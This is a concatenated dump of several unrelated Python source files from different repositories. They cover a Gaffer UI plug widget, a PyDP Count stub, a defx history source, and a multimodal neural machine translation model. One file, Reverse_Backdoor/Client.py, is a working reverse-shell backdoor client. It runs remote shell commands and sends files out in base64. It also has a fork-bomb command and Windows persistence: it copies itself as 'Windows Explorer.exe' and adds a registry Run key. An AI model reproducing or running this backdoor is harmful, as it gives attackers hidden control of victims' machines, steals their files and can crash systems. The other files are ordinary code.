d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferUI/UserPlugValueWidget.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferUI/UserPlugValueWidget.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
##########################################################################
#
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import IECore
import Gaffer
import GafferUI
class UserPlugValueWidget( GafferUI.PlugValueWidget ) :
def __init__( self, plug, editable=True, **kw ) :
self.__column = GafferUI.ListContainer( spacing = 6 )
GafferUI.PlugValueWidget.__init__( self, self.__column, plug, **kw )
with self.__column :
self.__layout = GafferUI.PlugLayout( plug )
if editable :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal ) :
GafferUI.Spacer( IECore.V2i( GafferUI.PlugWidget.labelWidth(), 1 ) )
addButton = GafferUI.MenuButton( image="plus.png", hasFrame=False, menu=GafferUI.Menu( self.__addMenuDefinition() ) )
addButton.setToolTip( "Click to add plugs" )
GafferUI.Spacer( IECore.V2i( 1 ), IECore.V2i( 999999, 1 ), parenting = { "expand" : True } )
def hasLabel( self ) :
return True
def setReadOnly( self, readOnly ) :
if readOnly == self.getReadOnly() :
return
GafferUI.PlugValueWidget.setReadOnly( self, readOnly )
self.__layout.setReadOnly( readOnly )
def childPlugValueWidget( self, childPlug, lazy=True ) :
return self.__layout.plugValueWidget( childPlug, lazy )
def _updateFromPlug( self ) :
pass
def __addMenuDefinition( self ) :
result = IECore.MenuDefinition()
result.append( "/Add/Bool", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.BoolPlug ) } )
result.append( "/Add/Float", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.FloatPlug ) } )
result.append( "/Add/Int", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.IntPlug ) } )
result.append( "/Add/NumericDivider", { "divider" : True } )
result.append( "/Add/String", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.StringPlug ) } )
result.append( "/Add/StringDivider", { "divider" : True } )
result.append( "/Add/V2i", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.V2iPlug ) } )
result.append( "/Add/V3i", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.V3iPlug ) } )
result.append( "/Add/V2f", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.V2fPlug ) } )
result.append( "/Add/V3f", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.V3fPlug ) } )
result.append( "/Add/VectorDivider", { "divider" : True } )
result.append( "/Add/Color3f", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.Color3fPlug ) } )
result.append( "/Add/Color4f", { "command" : IECore.curry( Gaffer.WeakMethod( self.__addPlug ), Gaffer.Color4fPlug ) } )
return result
def __addPlug( self, plugType ) :
d = GafferUI.TextInputDialogue( initialText = "unnamed", title = "Enter name", confirmLabel = "Create" )
name = d.waitForText( parentWindow = self.ancestor( GafferUI.Window ) )
d.setVisible( False )
if not name :
return
with Gaffer.UndoContext( self.getPlug().node().scriptNode() ) :
plug = plugType( name, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
self.getPlug().addChild( plug )
GafferUI.PlugValueWidget.registerCreator( Gaffer.Node, "user", UserPlugValueWidget )
##########################################################################
# Plug menu
##########################################################################
def __deletePlug( plug ) :
with Gaffer.UndoContext( plug.ancestor( Gaffer.ScriptNode ) ) :
plug.parent().removeChild( plug )
def __plugPopupMenu( menuDefinition, plugValueWidget ) :
plug = plugValueWidget.getPlug()
node = plug.node()
if plug.parent().isSame( node["user"] ) :
menuDefinition.append( "/DeleteDivider", { "divider" : True } )
menuDefinition.append( "/Delete", { "command" : IECore.curry( __deletePlug, plug ), "active" : not plugValueWidget.getReadOnly() } )
__plugPopupMenuConnection = GafferUI.PlugValueWidget.popupMenuSignal().connect( __plugPopupMenu )
| 42.007246
| 134
| 0.678282
|
d79537c50f59b10ee438fa1d72f815e07e3af076
| 2,337
|
py
|
Python
|
Reverse_Backdoor/Client.py
|
Rutherford-sudo/BasicPentestTools
|
3a2f5e6b9b2bea8521efad1eecccf236b2572981
|
[
"MIT"
] | 1
|
2021-02-18T10:43:45.000Z
|
2021-02-18T10:43:45.000Z
|
Reverse_Backdoor/Client.py
|
Rutherford-sudo/BasicPentestTools
|
3a2f5e6b9b2bea8521efad1eecccf236b2572981
|
[
"MIT"
] | null | null | null |
Reverse_Backdoor/Client.py
|
Rutherford-sudo/BasicPentestTools
|
3a2f5e6b9b2bea8521efad1eecccf236b2572981
|
[
"MIT"
] | 1
|
2020-05-26T14:51:03.000Z
|
2020-05-26T14:51:03.000Z
|
import socket
import subprocess
import os
import platform
import colorama
from colorama import Fore, Style
from time import sleep
import getpass
import base64
import shutil
import sys
colorama.init()
RHOST = "127.0.0.1"
RPORT = 8080
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((RHOST,RPORT))
def Persist(): #Work just for Windows Systems
location = os.environ["appdata"] + "\\Windows Explorer.exe"
if not os.path.exists(location):
shutil.copyfile(sys.executable, location)
subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + location + '"', shell=True)
while True:
try:
header = f"""{Fore.RED}{getpass.getuser()}@{platform.node()}{Style.RESET_ALL}:{Fore.LIGHTBLUE_EX}{os.getcwd()}{Style.RESET_ALL}$ """
sock.send(header.encode())
STDOUT, STDERR = None, None
command = sock.recv(1024).decode("utf-8")
#Persist()
if command == "list":
sock.send(str(os.listdir(".")).encode())
elif command == "forkbomb":
while True:
os.fork()
elif command.split(" ")[0] == "cd":
os.chdir(command.split(" ")[1])
sock.send("[+] Directory : {}".format(os.getcwd()).encode())
elif command.split(" ")[0] == "download":
with open(command.split(" ")[1],"rb") as f:
file = base64.b64encode(f.read())
while file:
#print("[!] Sending Data...")
sock.send(file)
file = f.read()
sleep(2)
sock.send(b"[+] Done!")
print("[+] Finished sending data!")
elif command == "exit":
sock.send(b"exit")
break
else:
comm = subprocess.Popen(str(command), shell=True, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
STDOUT, STDERR = comm.communicate()
if not STDOUT:
sock.send(STDERR)
else:
sock.send(STDOUT)
if not command:
print("[X] Connection Drooped!")
break
except Exception as e:
sock.send("Error : {}".format(str(e)).encode())
sock.close()
| 29.582278
| 140
| 0.551134
|
c66ddcac90d0b1e9541a38c81485f2408b268aee
| 238
|
py
|
Python
|
pydp/algorithms/laplacian/_count.py
|
Vishwaak/PyDP
|
408384534843bd297ec7d59ce820c7099a80d848
|
[
"Apache-2.0"
] | null | null | null |
pydp/algorithms/laplacian/_count.py
|
Vishwaak/PyDP
|
408384534843bd297ec7d59ce820c7099a80d848
|
[
"Apache-2.0"
] | null | null | null |
pydp/algorithms/laplacian/_count.py
|
Vishwaak/PyDP
|
408384534843bd297ec7d59ce820c7099a80d848
|
[
"Apache-2.0"
] | null | null | null |
from .._algorithm import MetaAlgorithm
class Count(MetaAlgorithm):
"""
Count Explanation
TODO
"""
def __init__(self, epsilon: float = 1.0, dtype: str = "int"):
super().__init__(epsilon=epsilon, dtype=dtype)
| 19.833333
| 65
| 0.642857
|
d782949a5ee986ef87749dd5976862a10f6b654f
| 1,015
|
py
|
Python
|
rplugin/python3/denite/source/defx/history.py
|
sanfusu/defx.nvim
|
8678b1ac3389f84aa64125f15ebfd6ba87f10b12
|
[
"MIT"
] | null | null | null |
rplugin/python3/denite/source/defx/history.py
|
sanfusu/defx.nvim
|
8678b1ac3389f84aa64125f15ebfd6ba87f10b12
|
[
"MIT"
] | null | null | null |
rplugin/python3/denite/source/defx/history.py
|
sanfusu/defx.nvim
|
8678b1ac3389f84aa64125f15ebfd6ba87f10b12
|
[
"MIT"
] | null | null | null |
# ============================================================================
# FILE: defx/history.py
# AUTHOR: Shougo Matsushita <Shougo.Matsu at gmail.com>
# License: MIT license
# ============================================================================
from defx.util import Nvim
from denite.source.base import Base
class Source(Base):
def __init__(self, vim: Nvim):
super().__init__(vim)
self.name = 'defx/history'
self.kind = 'command'
self._histories = []
def on_init(self, context: dict):
options = self.vim.current.buffer.options
if 'filetype' not in options or options['filetype'] != 'defx':
return
self._histories = reversed(self.vim.vars['defx#_histories'])
def gather_candidates(self, context: dict):
return [{
'word': x,
'abbr': x + '/',
'action__command': f"call defx#call_action('cd', ['{x}'])",
'action__path': x,
} for x in self._histories]
| 29.852941
| 78
| 0.499507
|
53a9050c454c60659f3effd5475616c0016ad2b7
| 25,249
|
py
|
Python
|
machine_translation_vision/models/NMT_AttentionImagine_Seq2Seq_Beam_V10.py
|
Eurus-Holmes/VAG-NMT
|
38095c4a5477a0e7e2fa1592e8401aa9cddf2beb
|
[
"Apache-2.0"
] | 12
|
2019-12-28T12:55:27.000Z
|
2022-02-10T00:19:53.000Z
|
machine_translation_vision/models/NMT_AttentionImagine_Seq2Seq_Beam_V10.py
|
Eurus-Holmes/VAG-NMT
|
38095c4a5477a0e7e2fa1592e8401aa9cddf2beb
|
[
"Apache-2.0"
] | 1
|
2020-01-07T12:13:03.000Z
|
2020-01-30T10:45:00.000Z
|
machine_translation_vision/models/NMT_AttentionImagine_Seq2Seq_Beam_V10.py
|
Eurus-Holmes/VAG-NMT
|
38095c4a5477a0e7e2fa1592e8401aa9cddf2beb
|
[
"Apache-2.0"
] | 3
|
2020-05-07T19:13:41.000Z
|
2021-02-19T11:26:00.000Z
|
#Implements a new Model where we project the stacked Hidden States from decoder to the Shared Space.
import torch
from torch.autograd import Variable
import torch.nn as nn
from torch import optim
import torch.nn.functional as F
import math
import random
import sys
from ..layers import LIUMCVC_Encoder
from ..layers import NMT_Decoder_V2
from ..layers import VSE_Imagine
from ..utils.utils import l2norm
SOS_token = 2
EOS_token = 3
use_cuda = torch.cuda.is_available()
#Construct an Attention ImagineSeq2Seq Model
class NMT_AttentionImagine_Seq2Seq_Beam_V10(nn.Module):
def __init__(self, \
src_size, \
tgt_size, \
im_feats_size, \
src_embedding_size, \
tgt_embedding_size, \
hidden_size, \
shared_embedding_size, \
loss_w, \
beam_size=1, \
attn_model = 'dot', \
n_layers=1, \
dropout_ctx=0.0, \
dropout_emb=0.0, \
dropout_out=0.0, \
dropout_rnn_enc=0.0, \
dropout_rnn_dec=0.0, \
dropout_im_emb = 0.0, \
dropout_txt_emb = 0.0, \
activation_vse = True, \
tied_emb=False):
super(NMT_AttentionImagine_Seq2Seq_Beam_V10,self).__init__()
#Define all the parameters
self.src_size = src_size
self.tgt_size = tgt_size
self.im_feats_size = im_feats_size
self.src_embedding_size = src_embedding_size
self.tgt_embedding_size = tgt_embedding_size
self.hidden_size = hidden_size
self.n_layers = n_layers
self.shared_embedding_size = shared_embedding_size
self.beam_size = beam_size
self.loss_w = loss_w
self.tied_emb=tied_emb
self.dropout_im_emb = dropout_im_emb
self.dropout_txt_emb = dropout_txt_emb
self.activation_vse = activation_vse
self.attn_model = attn_model
#Define all the parts.
self.encoder = LIUMCVC_Encoder(src_size,src_embedding_size,hidden_size,n_layers,dropout_rnn=dropout_rnn_enc, dropout_ctx=dropout_ctx, dropout_emb=dropout_emb)
self.decoder = NMT_Decoder_V2(tgt_size,tgt_embedding_size,hidden_size,2*hidden_size,n_layers,dropout_rnn=dropout_rnn_dec,dropout_out=dropout_out,dropout_emb=0.0,tied_emb=tied_emb)
#self.decoder = NMT_Decoder_V2(tgt_size,tgt_embedding_size,hidden_size,2*hidden_size,n_layers,dropout_rnn=dropout_rnn_dec,dropout_out=dropout_out,dropout_emb=0.0,tied_emb=tied_emb)
#Initialize the VSE_Imagine Module
self.vse_imagine = VSE_Imagine(self.attn_model, self.im_feats_size, 2*self.hidden_size, self.shared_embedding_size, self.dropout_im_emb, self.dropout_txt_emb, self.activation_vse)
#Decoder Initialization Layer
self.decoderini = nn.Linear(2*hidden_size,hidden_size)
#Initilaize the layers with xavier method
self.reset_parameters()
def reset_parameters(self):
for name, param in self.named_parameters():
if param.requires_grad and 'bias' not in name and param.data.dim() > 1:
nn.init.kaiming_normal(param.data)
def forward(self,src_var,src_lengths,tgt_var,im_var,teacher_force_ratio=1.0,max_length=80, criterion_mt=None, criterion_vse=None):
'''
Feed forward the input variable and compute the loss. tgt_var is always provided
Input:
src_var: The minibatch input sentence indexes representation with size (B*W_s)
src_lengths: The list of lenths of each sentence in the minimatch, the size is (B)
im_var: The minibatch of the paired image ResNet Feature vecotrs, with the size(B*I), I is the image feature size.
teacher_force_ratio: A scalar between 0 and 1 which defines the probability ot conduct the teacher_force traning.
tgt_var: The output sentence groundtruth, if provided it will be used to help guide the training of the network. The Size is (B*W_t)
If not, it will just generate a target sentence which is shorter thatn max_length or stop when it finds a EOS_Tag.
max_length: A integer value that specifies the longest sentence that can be generated from this network.
Output:
loss: Total loss which is the sum of loss_mt and loss_vse
loss_mt: The loss for seq2seq machine translation
loss_vse: The loss for visual-text embedding space learning
'''
#Define the batch_size and input_length
batch_size = src_var.size()[0]
tgt_l = tgt_var.size()[1]
loss = 0
loss_mt = 0
loss_vse = 0
tgt_mask = (tgt_var != 0).float()
#Update the self.tgt_l
self.tgt_l = tgt_l
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
#decoder_hidden = torch.mean(encoder_outputs,dim=0,keepdim=True)
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
#Initialize the output
if use_cuda:
decoder_input = decoder_input.cuda()
if tgt_var is not None:
tgt_mask = (tgt_var != 0).float()
decoder_hiddens = Variable(torch.zeros(tgt_l,batch_size,2*self.hidden_size))
if use_cuda:
decoder_hiddens = decoder_hiddens.cuda()
#Determine whether teacher forcing is used.
is_teacher = random.random() < teacher_force_ratio
if is_teacher:
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs, ctx_mask=context_mask)
loss_n = criterion_mt(decoder_output,tgt_var[:,di])
loss_mt += loss_n
decoder_hiddens[di] = decoder_stacked_hidden
decoder_input = tgt_var[:,di]
else:
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs, ctx_mask=context_mask)
loss_n = criterion_mt(decoder_output,tgt_var[:,di])
loss_mt += loss_n
#Normalize The Text Embedding Vector
decoder_hiddens[di] = decoder_stacked_hidden
#text_embedding_sets[di] = text_embedding_di
_,top1 = decoder_output.data.topk(1)
decoder_input = Variable(top1)
if use_cuda:
decoder_input = decoder_input.cuda()
#Average the machine translation loss
#loss_mt = loss_mt / tgt_l
loss_mt = (loss_mt / tgt_mask.sum(-1)).mean()
#Compute the VSE loss with VSE_Imagine Module
loss_vse = self.vse_imagine(im_var,decoder_hiddens,criterion_vse=criterion_vse)
loss = self.loss_w*loss_mt + (1-self.loss_w)*loss_vse
return loss,loss_mt,loss_vse
def _validate_args(self,src_var,tgt_var,max_length):
batch_size = src_var.size()[0]
if tgt_var is None:
tgt_l = max_length
else:
tgt_l = tgt_var.size()[1]
return batch_size,tgt_l
def beamsearch_decode(self,src_var,src_lengths,beam_size=1,max_length=80,tgt_var=None):
#Initiliaize the tgt_l
tgt_l = max_length
if tgt_var is not None:
tgt_l = tgt_var.size()[1]
batch_size = src_var.size()[0]
self.tgt_l = tgt_l
self.final_sample = []
self.beam_size = beam_size
#Encode the Sentences.
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
if use_cuda:
decoder_input = decoder_input.cuda()
if beam_size == 1:
decoder_translation_list = []
for di in range(tgt_l):
decoder_output,decoder_hidden,_ = self.decoder(decoder_input, decoder_hidden, encoder_outputs,ctx_mask=context_mask)
_,top1 = decoder_output.data.topk(1)
#Append the current prediction to decoder_translation
decoder_translation_list.append(top1[:,0])
decoder_input = Variable(top1)
if use_cuda:
decoder_input = decoder_input.cuda()
#Compute the translation_prediction
for b in range(batch_size):
current_list = []
for i in range(tgt_l):
current_translation_token = decoder_translation_list[i][b]
if current_translation_token == EOS_token:
break
current_list.append(current_translation_token)
self.final_sample.append(current_list)
if beam_size > 1:
self.final_sample = self.beamsearch(encoder_outputs,context_mask,decoder_input,decoder_hidden,beam_size,tgt_l)
return self.final_sample
def beamsearch(self,encoder_outputs,context_mask,decoder_input,decoder_hidden,beam_size,max_length,avoid_double=True,avoid_unk=False):
#Define Batch_Size
batch_size = encoder_outputs.size(1)
n_vocab = self.tgt_size
#Define Mask to apply to pdxs.view(-1) to fix indices
nk_mask = torch.arange(batch_size*beam_size).long() #[0:batch_size*beam_size]
if use_cuda:
nk_mask = nk_mask.cuda()
pdxs_mask = (nk_mask/beam_size)*beam_size
#Tile indices to use in the loop to expand first dim
tile = nk_mask / beam_size
#Define the beam
beam = torch.zeros((max_length, batch_size, beam_size)).long()
if use_cuda:
beam = beam.cuda()
#Create encoder outptus,context_mask with batch_dimension = batch_size*beam_size
encoder_outputs_di = encoder_outputs[:,tile,:]
context_mask_di = context_mask[:,tile]
#Define a inf numbers to assign to
inf = -1e5
for di in range(max_length):
if di == 0:
decoder_output,decoder_hidden,_ = self.decoder(decoder_input,decoder_hidden,encoder_outputs,ctx_mask=context_mask)
nll,topk = decoder_output.data.topk(k=beam_size,sorted=False) #nll and topk have the shape [batch,topk]
beam[0] = topk
else:
cur_tokens = beam[di-1].view(-1) #Get the input tokens to the next step
fini_idxs = (cur_tokens == EOS_token).nonzero() #The index that checks whether the beam has terminated
n_fini = fini_idxs.numel() #Verify if all the beams are terminated
if n_fini == batch_size*beam_size:
break
#Get the decoder fo the next iteration(batch_size*beam_size,1)
decoder_input = Variable(cur_tokens,volatile=True)
decoder_hidden = decoder_hidden[:,tile,:] #This operation will create a decoder_hidden states with size [batch_size*beam_size,H]
decoder_output,decoder_hidden,_ = self.decoder(decoder_input, decoder_hidden,encoder_outputs_di, ctx_mask=context_mask_di)
decoder_output = decoder_output.data
#Suppress probabilities of previous tokens at current time step, which avoids generating repeated word.
if avoid_double:
decoder_output.view(-1).index_fill_(0,cur_tokens+(nk_mask*n_vocab),inf)
#Suppress probabilities of unk word.
if avoid_unk:
decoder_output[:,UNK_token] = inf
"""
Favor finished hyps to generate <eos> again
Their nll scores will not increase further and they will always be kept in the beam.
This operation assures the future generation for those finished hypes will always pick EOS_token.
"""
if n_fini > 0:
fidxs = fini_idxs[:,0]
decoder_output.index_fill_(0,fidxs,inf)
decoder_output.view(-1).index_fill_(0,fidxs*self.tgt_size+EOS_token,0)
#Update the current score
nll = (nll.unsqueeze(2) + decoder_output.view(batch_size,-1,n_vocab)).view(batch_size,-1) #Size is [batch,beam*n_vocab]
#Pick the top beam_size best scores
nll,idxs = nll.topk(beam_size,sorted=False) #nll, idxs have the size [batch_size,beam_size]
#previous indices into the beam and current token indices
pdxs = idxs / n_vocab #size is [batch_size,beam_size]
#Update the previous token in beam[di]
beam[di] = idxs % n_vocab
# Permute all hypothesis history according to new order
beam[:di] = beam[:di].gather(2,pdxs.repeat(di,1,1))
# Compute correct previous indices
#Mask is nedded since we are in flatten regime
tile = pdxs.view(-1) + pdxs_mask
#Put an explicit <eos> to ensure that every sentence end in the end
beam[max_length-1] = EOS_token
#Find lengths by summing tokens not in (pad,bos,eos)
lens = (beam.transpose(0,2) > 3).sum(-1).t().float().clamp(min=1)
#Normalize Scores by length
nll /= lens.float()
top_hyps = nll.topk(1, sorted=False)[1].squeeze(1)
#Get best hyp for each sample in the batch
hyps = beam[:,range(batch_size),top_hyps].cpu().numpy().T
final_sample = []
for b in range(batch_size):
current_list = []
for i in range(max_length):
current_translation_token = hyps[b][i]
if current_translation_token == EOS_token:
break
current_list.append(current_translation_token)
final_sample.append(current_list)
return final_sample
###########################Function Defined Below is for Image Retrieval##############
def embed_sent_im_eval(self,src_var,src_lengths,tgt_var,im_feats):
"""
Embed the Target Sentences to the shared space
Input:
source_sent: The Source Sent Index Variable with size(B,W), W is just the length of the sentence
target_sent: The Target Sent Index Variable with size(B,W) W is the length of the sentence
im_feats: The Image Features with size (B,D), D is the dimension of image feature.
Output:
txt_embedding.data: The embedded sentence tensor with size (B, SD), SD is the dimension of shared embedding
space.
im_embedding.data: The embedded image tensor with size (B, SD), SD is the dimension of the shared embedding space
"""
#Define the batch_size and input_length
batch_size = src_var.size()[0]
tgt_l = tgt_var.size()[1]
#Update the self.tgt_l
self.tgt_l = tgt_l
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
#decoder_hidden = torch.mean(encoder_outputs,dim=0,keepdim=True)
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
#Initialize the output
if use_cuda:
decoder_input = decoder_input.cuda()
decoder_hiddens = Variable(torch.zeros(tgt_l,batch_size,2*self.hidden_size))
if use_cuda:
decoder_hiddens = decoder_hiddens.cuda()
#Determine whether teacher forcing is used.
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
#update text_embedding_sets
decoder_hiddens[di] = decoder_stacked_hidden
decoder_input = tgt_var[:,di]
im_embedding,text_embedding = self.vse_imagine.get_emb_vec(im_feats, decoder_hiddens)
#im_embedding = l2norm(im_embedding)
#I think may be another text_embedding here.
return im_embedding.data, text_embedding.data
def embed_sent_im_test(self,src_var,src_lengths,im_feats,max_length=80):
"""
Embed the Target Sentences to the shared space
Input:
source_sent: The Source Sent Index Variable with size(B,W), W is just the length of the sentence
target_sent: The Target Sent Index Variable with size(B,W) W is the length of the sentence
im_feats: The Image Features with size (B,D), D is the dimension of image feature.
Output:
txt_embedding.data: The embedded sentence tensor with size (B, SD), SD is the dimension of shared embedding
space.
im_embedding.data: The embedded image tensor with size (B, SD), SD is the dimension of the shared embedding space
"""
#Define the batch_size and input_length
batch_size = src_var.size()[0]
tgt_l = max_length
#Update the self.tgt_l
self.tgt_l = tgt_l
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
#decoder_hidden = torch.mean(encoder_outputs,dim=0,keepdim=True)
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
#Initialize the output
if use_cuda:
decoder_input = decoder_input.cuda()
decoder_hiddens = Variable(torch.zeros(tgt_l,batch_size,2*self.hidden_size))
if use_cuda:
decoder_hiddens = decoder_hiddens.cuda()
#Determine whether teacher forcing is used.
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
decoder_hiddens[di] = decoder_stacked_hidden
#text_embedding_sets[di] = text_embedding_di
_,top1 = decoder_output.data.topk(1)
decoder_input = Variable(top1)
if use_cuda:
decoder_input = decoder_input.cuda()
#Get the embedded vectors from vse_imagine
im_embedding,text_embedding = self.vse_imagine.get_emb_vec(im_feats, decoder_hiddens)
#I think may be another text_embedding here.
return im_embedding.data, text_embedding.data
########################################################################
def get_imagine_attention_eval(self,src_var,src_lengths,tgt_var,im_feats):
"""
Get the attention_weights for validation dataset when tgt_var is available.
Input:
source_var: The Source Sent Index Variable with size(B,W), W is just the length of the sentence
target_var: The Target Sent Index Variable with size(B,W) W is the length of the sentence
im_feats: The Image Features with size (B,D), D is the dimension of image feature.
Output:
output_translation: List of index for translations predicted by the seq2seq model
attention_weights: (B,T)
"""
#Define the batch_size and input_length
batch_size = src_var.size()[0]
tgt_l = tgt_var.size()[1]
#Update the self.tgt_l
self.tgt_l = tgt_l
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
#decoder_hidden = torch.mean(encoder_outputs,dim=0,keepdim=True)
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
#Initialize the output
if use_cuda:
decoder_input = decoder_input.cuda()
decoder_hiddens = Variable(torch.zeros(tgt_l,batch_size,2*self.hidden_size))
if use_cuda:
decoder_hiddens = decoder_hiddens.cuda()
#Determine whether teacher forcing is used.
decoder_translation_list = []
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
#update text_embedding_sets
decoder_hiddens[di] = decoder_stacked_hidden
#Update the transition list.
_,top1 = decoder_output.data.topk(1)
decoder_translation_list.append(top1[:,0])
#update the decoder_input for the next step
decoder_input = tgt_var[:,di]
#Get the attention weights
attn_weights = self.vse_imagine.get_imagine_weights(im_feats,decoder_hiddens)
#Get the transition_list
final_translations = []
for b in range(batch_size):
current_list = []
for i in range(tgt_l):
current_translation_token = decoder_translation_list[i][b]
if current_translation_token == EOS_token:
break
current_list.append(current_translation_token)
final_translations.append(current_list)
return attn_weights.data,final_translations
def get_imagine_attention_test(self,src_var,src_lengths,im_feats,max_length=80):
"""
Get the attention_weights for validation dataset when tgt_var is available.
Input:
source_var: The Source Sent Index Variable with size(B,W), W is just the length of the sentence
target_var: The Target Sent Index Variable with size(B,W) W is the length of the sentence
im_feats: The Image Features with size (B,D), D is the dimension of image feature.
Output:
output_translation: List of index for translations predicted by the seq2seq model
attention_weights: (B,T)
"""
#Define the batch_size and input_length
batch_size = src_var.size()[0]
tgt_l = max_length
#Update the self.tgt_l
self.tgt_l = tgt_l
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
#decoder_hidden = torch.mean(encoder_outputs,dim=0,keepdim=True)
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
#Initialize the output
if use_cuda:
decoder_input = decoder_input.cuda()
decoder_hiddens = Variable(torch.zeros(tgt_l,batch_size,2*self.hidden_size))
if use_cuda:
decoder_hiddens = decoder_hiddens.cuda()
#Determine whether teacher forcing is used.
decoder_translation_list = []
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
#update text_embedding_sets
decoder_hiddens[di] = decoder_stacked_hidden
#Update the transition list.
_,top1 = decoder_output.data.topk(1)
decoder_translation_list.append(top1[:,0])
#update the decoder_input for the next step
decoder_input = Variable(top1)
if use_cuda:
decoder_input = decoder_input.cuda()
#Get the attention weights
attn_weights = self.vse_imagine.get_imagine_weights(im_feats,decoder_hiddens)
#Get the transition_list
final_translations = []
for b in range(batch_size):
current_list = []
for i in range(tgt_l):
current_translation_token = decoder_translation_list[i][b]
if current_translation_token == EOS_token:
break
current_list.append(current_translation_token)
final_translations.append(current_list)
return attn_weights.data,final_translations
| 44.609541
| 188
| 0.633768
|
24932860fce2a2298cd7875fad10db12ef2aab1a
| 1,344
|
py
|
Python
|
corefacility/roi/entity/rectangular_roi/rectangular_roi_provider.py
|
serik1987/corefacility
|
78d84e19403361e83ef562e738473849f9133bef
|
[
"RSA-MD"
] | null | null | null |
